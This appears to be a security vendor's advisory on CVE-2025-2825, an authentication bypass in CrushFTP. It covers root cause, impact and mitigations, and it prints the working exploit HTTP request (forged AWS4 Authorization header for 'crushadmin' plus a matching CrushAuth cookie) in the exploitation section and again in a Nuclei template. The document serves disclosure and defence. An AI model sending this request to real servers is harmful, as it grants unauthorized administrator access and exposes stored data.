Exploited: Critical Unauthenticated Access Vulnerability in CrushFTP (CVE-2025-2825)

In the ever-evolving landscape of web application vulnerabilities, a new critical flaw has emerged. CVE-2025-2825 is a high-severity vulnerability that allows attackers to bypass authentication on CrushFTP servers. This popular enterprise file transfer solution is often used in corporate environments to manage sensitive data, making this vulnerability particularly concerning. Attackers are actively exploiting this flaw in the wild, making it a top-priority security concern for administrators to address quickly.

What is CVE-2025-2825?

CVE-2025-2825 is a critical authentication bypass vulnerability affecting CrushFTP, a popular enterprise file transfer solution. This high-severity flaw allows remote, unauthenticated attackers to gain unauthorized access to vulnerable CrushFTP servers without requiring valid credentials – effectively an authentication bypass. The vulnerability affects CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0.

The vulnerability has been assigned a CVSS 3.1 score of 9.8 (Critical) due to its network attack vector (no privileges or user interaction needed) and the potential for full system compromise. It was originally discovered by researchers at Outpost24 and patched on March 21, 2025.

At the core of this vulnerability is an improper authentication implementation (CWE-287) in CrushFTP’s HTTP request handler. The issue specifically resides in the loginCheckHeaderAuth() mechanism, which improperly handles AWS S3-style authentication headers. When a specific condition is triggered, the server allows authentication to succeed without validating the password at all.

The root cause was traced to a logic error where an internal flag called anyPass is set when a username without a tilde (~) character is provided in the authentication header. When this flag is active, the server bypasses the password check completely, as shown in this simplified vulnerable code:

// Vulnerable code from CrushFTP's authentication handler

if (anyPass && user.getProperty("enabled", "").equals("true")) {

    return user; // Returns user without password validation

}

// Normal password check (skipped if anyPass is true)

if (!password.equals(user.getProperty("password"))) {

    return null; // Authentication should fail here

}

This critical flaw means that an attacker can craft a special HTTP request that completely bypasses authentication, gaining the same access privileges as a legitimate administrator.

Exploiting the Vulnerability

CVE-2025-2825 is trivially exploitable with minimal technical knowledge. An attacker only needs network access to a vulnerable CrushFTP server’s HTTP/S interface – no credentials required. The exploit involves:

1. Crafting a malicious HTTP request with a fake AWS S3 Authorization header and a specially formatted CrushAuth cookie
2. Targeting known default usernames like “crushadmin” (without including a tilde character)
3. Submitting the request to the CrushFTP Web Interface

Here’s an example of how attackers are exploiting this vulnerability in the wild:

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1

Host: victim-server:8080

Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111

Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

In this request:

• The Authorization header uses an AWS4-HMAC-SHA256 scheme with the credential set to “crushadmin” (the default admin username)
• The CrushAuth cookie is a dummy session token that matches the format expected by the server
• The c2f parameter in the URL matches the suffix of the CrushAuth cookie

When this request is processed, the server sets the anyPass flag to true because the username (crushadmin) contains no tilde character. This causes the authentication logic to accept any password (or no password at all), effectively bypassing the authentication system entirely.

The server responds with a successful HTTP 200 status code and returns the requested information (in this case, a list of user accounts). At this point, the attacker has the same privileges as an administrator and can access sensitive files, upload malicious content, create backdoor accounts, or execute other administrative functions.

Multiple security firms have published proof-of-concept (PoC) exploits and automated scan tools for this vulnerability, including Nuclei templates that can detect vulnerable servers. This widespread availability of exploitation tools means that even low-skilled attackers can easily target vulnerable systems.

Potential Risks

The impact of CVE-2025-2825 is severe, with significant security implications across the confidentiality, integrity, and availability (CIA) triad:

1. Confidentiality Breach
   • Attackers can access and exfiltrate sensitive data stored on the CrushFTP server
   • May include confidential files, intellectual property, or customer information
   • Any files managed by the server are potentially exposed
2. Integrity Compromise
   • Malicious actors can modify, delete, or replace legitimate files
   • Possibility of injecting malware into downloadable content
   • Alteration of configuration files or server settings
3. System Availability and Complete Compromise
   • Attackers can upload malicious scripts leading to remote code execution
   • Potential for ransomware deployment across all accessible files
   • Installation of persistent backdoors for continued access
   • Lateral movement to other internal systems on the same network

The real-world threat landscape makes this vulnerability particularly concerning:

• Active Exploitation in the Wild: Within days of disclosure, security researchers observed widespread scanning and exploitation attempts. The Shadowserver Foundation identified approximately 1,800 exposed CrushFTP instances worldwide (over 900 in the U.S.) and reported dozens of exploitation attempts against their honeypots.
• Attractive Target for Threat Actors: File transfer systems like CrushFTP are prime targets for cybercriminals, especially ransomware gangs and data extortion groups. Attackers have a documented history of leveraging vulnerabilities in file-sharing solutions (such as MOVEit Transfer and Citrix ShareFile) to orchestrate large-scale breaches.

Given the critical CVSS score (9.8), ease of exploitation, and confirmed attack activity, any internet-facing CrushFTP server running an affected version represents an immediate and severe security risk that requires urgent remediation.

Mitigation Steps

To protect your systems from CVE-2025-2825, immediate action is required. Here are the recommended mitigation strategies:

1. Update CrushFTP Immediately

The most effective remediation is to update your CrushFTP installation to a patched version:

• For CrushFTP 11.x users: Upgrade to version 11.3.1 or later
• For CrushFTP 10.x users: Upgrade to version 10.8.4 or later

# Example steps for updating CrushFTP (general process)

# 1. Download the latest version from the CrushFTP website

# 2. Stop your CrushFTP service

systemctl stop crushftp  # or equivalent command for your system

# 3. Backup your existing installation

cp -r /path/to/crushftp /path/to/crushftp_backup

# 4. Extract and replace the CrushFTP files

# 5. Restart the service

systemctl start crushftp  # or equivalent command for your system

# 6. Verify the version after update from admin interface or logs

For CrushFTP v11.2.3_19 or higher, you can enable the auto-update feature by setting daily_check_and_auto_update_on_idle in the prefs.XML file to fetch patches automatically in the future.

2. Implement Network Protections (If Patching Is Delayed)

If immediate patching is not possible, implement temporary measures to reduce your attack surface:

Enable CrushFTP’s DMZ Proxy Mode: The vendor has confirmed that the CVE-2025-2825 exploit does not work when the CrushFTP DMZ proxy is properly configured. In this mode, an external proxy instance handles internet traffic and communicates securely with the internal server.

<!– Example configuration in prefs.XML to enable DMZ mode –>

<item name=”dmz_mode”>true</item>

<item name=”dmz_server_key”>your_secure_key_here</item>

<item name=”dmz_remote_server”>internal_server_address</item>

Restrict Network Access via Firewall/WAF: Use firewall rules or cloud security groups to limit incoming traffic to the CrushFTP HTTP/S ports (typically 8080 or 443) to only trusted IP addresses:

# Example iptables rules to restrict access to CrushFTP ports

iptables -A INPUT -p tcp --dport 8080 -s 192.168.1.0/24 -j ACCEPT  # Allow internal network

iptables -A INPUT -p tcp --dport 8080 -j DROP  # Block all other access

# Example WAF rule to block suspicious authorization headers

SecRule REQUEST_HEADERS:Authorization "@contains AWS4-HMAC-SHA256" \

    "id:1000001,phase:1,deny,status:403,msg:'Potential CrushFTP CVE-2025-2825 exploit attempt'"

Require VPN access for remote users to prevent direct exposure to the internet.

3. Monitor and Harden

Whether you’ve patched or not, ensure the threat is detected and mitigated:

Check for Indicators of Compromise: Review your CrushFTP server logs for signs of unauthorized access, particularly focusing on default accounts:

# Example log entries that might indicate exploitation

2025-03-25 12:34:56 – [LOGIN] Login successful for user ‘crushadmin’ from IP 203.0.113.37

2025-03-26 08:12:34 – [USER] New user ‘backdoor_admin’ created by ‘crushadmin’

Look for unusual activities, such as account creation, permission changes, or file operations from unexpected sources.

Secure Default Credentials: Change default passwords and consider renaming or disabling default accounts when possible:

# In CrushFTP admin interface:

1. Navigate to Users > crushadmin

2. Set a strong, unique password (20+ characters with mixed case, numbers, and symbols)

3. Consider renaming the default admin account

4. Enable two-factor authentication if available

Apply Least Privilege Principle: Review your CrushFTP user permissions and server access rights:

# Example configuration to restrict user capabilities

<user name="standard_user">

  <item name="admin">false</item>

  <item name="view_log">false</item>

  <item name="root_dir">/limited/access/path</item>

  <!-- Additional restrictions -->

</user>

Isolate the CrushFTP server from critical systems and limit its access to only necessary resources.

Use Security Tools for Detection: Implement vulnerability scanning to identify unpatched instances. Community-provided detection tools, such as the Nuclei template for CVE-2025-2825, can help locate vulnerable servers:

# Example Nuclei template snippet for detecting CVE-2025-2825

id: crushftp-auth-bypass

info:

  name: CrushFTP Authentication Bypass

  author: security-researcher

  severity: critical

  description: Detects CrushFTP servers vulnerable to CVE-2025-2825 authentication bypass

requests:

  - method: GET

    path:

      - "{{BaseURL}}/WebInterface/function/?command=getUserList&c2f=1111"

    headers:

      Cookie: "CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111"

      Authorization: "AWS4-HMAC-SHA256 Credential=crushadmin/"

By implementing these mitigation strategies promptly, you can protect your systems from this critical vulnerability and minimize the risk of compromise.

Am I Impacted by CVE-2025-2825?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the threat center of the IONIX portal.

IONIX customers will see updated information on their specific assets in the threat center of the IONIX portal.

References

1. National Vulnerability Database: CVE-2025-2825 – NIST National Vulnerability Database entry for CrushFTP Unauthenticated Access Vulnerability
2. CrushFTP Official Advisory: Update Notice – Vendor security advisory on Unauthenticated HTTP(S) Port Access on CrushFTP v10/v11
3. ProjectDiscovery Research: CrushFTP Authentication Bypass – Technical deep dive and proof-of-concept exploit details
4. Help Net Security: Patch critical vulnerability ASAP! – Vulnerability overview and mitigation guidance
5. SecurityWeek: Hackers Exploiting CrushFTP Vulnerability – Threat landscape analysis including exploitation attempts and affected asset count